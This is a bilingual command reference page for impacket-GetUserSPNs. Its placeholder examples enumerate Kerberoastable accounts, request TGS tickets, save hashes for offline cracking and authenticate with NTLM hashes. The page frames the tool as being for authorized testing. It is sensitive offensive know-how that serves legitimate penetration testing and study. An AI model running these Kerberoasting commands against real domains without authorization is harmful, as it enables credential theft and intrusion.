Linux command
impacket-getuserspns 命令
网络
复制后可按需替换文件名、目录或参数。
常用示例
Find Kerberoastable accounts
impacket-GetUserSPNs [domain]/[user]:[password] -dc-ip [dc-ip]
Request service tickets
impacket-GetUserSPNs [domain]/[user]:[password] -dc-ip [dc-ip] -request
Output to file for cracking
impacket-GetUserSPNs [domain]/[user]:[password] -dc-ip [dc-ip] -request -outputfile [hashes.txt]
Use NTLM hash
impacket-GetUserSPNs -hashes :[hash] [domain]/[user] -dc-ip [dc-ip]
说明
impacket-GetUserSPNs finds and requests Kerberos service tickets for user accounts with SPNs (Service Principal Names). Part of the Impacket toolkit. Used for Kerberoasting attacks where TGS tickets can be cracked offline. For authorized security testing only.
参数
- -dc-ip _ip_
- Domain controller IP.
- -request
- Request TGS tickets.
- -outputfile _file_
- Save tickets to file.
- -hashes _lm:nt_
- Use NTLM hashes.
- -k
- Use Kerberos authentication.
FAQ
What is the impacket-getuserspns command used for?
impacket-GetUserSPNs finds and requests Kerberos service tickets for user accounts with SPNs (Service Principal Names). Part of the Impacket toolkit. Used for Kerberoasting attacks where TGS tickets can be cracked offline. For authorized security testing only.
How do I run a basic impacket-getuserspns example?
Run `impacket-GetUserSPNs [domain]/[user]:[password] -dc-ip [dc-ip]` in a terminal, then adjust file names, paths, flags, or remote targets for your system.
What does -dc-ip _ip_ do in impacket-getuserspns?
Domain controller IP.